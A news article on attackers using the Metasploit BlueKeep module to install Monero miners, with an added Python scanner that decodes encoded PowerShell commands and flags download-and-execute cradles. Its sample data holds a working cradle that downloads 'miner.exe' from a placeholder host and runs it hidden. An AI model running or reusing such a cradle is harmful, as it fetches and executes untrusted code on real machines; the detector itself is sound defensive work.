5 November 2019

Hackers using BlueKeep remote desktop security flaw to install cryptocurrency miners on vulnerable PCs

Security researchers have detected the first mass-hacking campaign using the BlueKeep flaw in the Windows operating system to infect computers with a cryptocurrency miner. The good news is that the exploit is not being leveraged as a self-propagating worm, as Microsoft cautioned back in May when it issued a patch and urged users to update their systems; rather, the attacks appear to be an opportunistic endeavor in pursuit of monetary gain.

Security researcher Kevin Beaumont detected a spike in attacks exploiting the BlueKeep vulnerability, but rather than taking remote control of the machines, the attackers were causing them to crash. According to Beaumont, the attacks began on October 23.

Beaumont’s discovery was confirmed by security expert Marcus "MalwareTech" Hutchins. According to Hutchins’ blog post, the attackers were using the demo BlueKeep exploit module released by the Metasploit team back in September to compromise Windows systems and install a Monero cryptocurrency miner.

"Finally, we confirm this segment [in crash dump] points to executable shellcode. At this point, we can assert valid BlueKeep exploit attempts in the wild, with shellcode that even matches that of the shellcode in the BlueKeep Metasploit module!" Hutchins said.

The analyzed exploit delivered encoded PowerShell commands as its initial payload; these downloaded the final malicious executable from a remote, attacker-controlled server and ran it on the targeted system.
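An encoded PowerShell initial stage of this kind is visible in process-creation telemetry as a `powershell.exe ... -enc <base64>` command line. The following Python is an added example for this article, not code from the article, Beaumont or Hutchins: it decodes the `-EncodedCommand` argument (base64 of a UTF-16LE script) from constructed log lines and flags the download-and-execute pattern described above. The log lines, the sample script and the `198.51.100.10` URL (RFC 5737 documentation range) are all constructed for the example.

```python
"""Decode PowerShell -EncodedCommand payloads found in process-creation log lines
and flag download-and-execute cradles.

Added example, not from the article or any cited researcher. The log lines, the
script and the 198.51.100.10 (RFC 5737 documentation range) URL are constructed.
"""
import base64
import binascii
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...);
# the switch is followed by standard base64 of a UTF-16LE script.
ENC_SWITCH_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")

# Crude substring indicators: a cradle needs something that fetches and something that runs.
DOWNLOAD_MARKERS = ("net.webclient", "downloadstring", "downloadfile",
                    "invoke-webrequest", "bitstransfer")
EXEC_MARKERS = ("invoke-expression", "iex", "start-process", "invoke-item")


def encode_command(script: str) -> str:
    """Produce the base64 form powershell.exe expects (UTF-16LE, standard alphabet)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script, or None if the line has no valid encoded command."""
    match = ENC_SWITCH_RE.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        # Bad alphabet/padding or an odd byte count: not a real encoded command.
        return None


def analyze(cmdline: str) -> dict:
    """Classify one command line; 'suspicious' means download and execute markers both present."""
    decoded = decode_encoded_command(cmdline)
    body = (decoded or "").lower()
    download = [m for m in DOWNLOAD_MARKERS if m in body]
    execute = [m for m in EXEC_MARKERS if m in body]
    return {
        "decoded": decoded,
        "urls": URL_RE.findall(decoded or ""),
        "hidden_window": bool(re.search(r"(?i)\s-w(?:indowstyle)?\s+hidden", cmdline)),
        "download_markers": download,
        "exec_markers": execute,
        "suspicious": bool(download and execute),
    }


def scan_log(lines):
    """Return (line_index, analysis) for every line whose decoded payload looks like a cradle."""
    findings = []
    for i, line in enumerate(lines):
        result = analyze(line)
        if result["suspicious"]:
            findings.append((i, result))
    return findings


# Constructed script resembling the download-and-execute stage described in the article.
SAMPLE_SCRIPT = ("$c=New-Object Net.WebClient;"
                 "$c.DownloadFile('http://198.51.100.10/miner.exe','C:\\Windows\\Temp\\x.exe');"
                 "Start-Process 'C:\\Windows\\Temp\\x.exe'")

# Constructed process-creation records (Sysmon-style fields, flattened to one line each).
SAMPLE_LOG = [
    "ParentImage: C:\\Windows\\explorer.exe | CommandLine: powershell.exe -NoProfile "
    "-ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "ParentImage: C:\\Windows\\System32\\cmd.exe | CommandLine: powershell.exe -nop -w hidden -enc "
    + encode_command(SAMPLE_SCRIPT),
    "ParentImage: C:\\Windows\\explorer.exe | CommandLine: powershell -e " + encode_command("Get-Date"),
    "ParentImage: C:\\Windows\\System32\\cmd.exe | CommandLine: powershell -enc QUJD",
]

if __name__ == "__main__":
    for idx, finding in scan_log(SAMPLE_LOG):
        print(f"line {idx}: urls={finding['urls']} hidden={finding['hidden_window']}")
        print("  decoded:", finding["decoded"])
```

Only the second record is flagged: it decodes to a script that both fetches (`Net.WebClient`, `DownloadFile`) and runs (`Start-Process`) a binary, and it was launched with a hidden window. The `-ExecutionPolicy Bypass` line is not mistaken for an encoded command, the encoded `Get-Date` decodes but is not flagged, and the malformed `QUJD` argument (three bytes, so not valid UTF-16LE) is rejected rather than crashing the scanner. The substring markers are deliberately simple; in production you would match on the decoded script with proper rules rather than this list.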

Hutchins also confirmed that this hacking operation does not include self-spreading, worm-like capabilities. Instead, the attackers appear to be scanning the internet for vulnerable Windows hosts with exposed RDP ports, deploying the BlueKeep exploit against them and then installing a cryptocurrency miner.
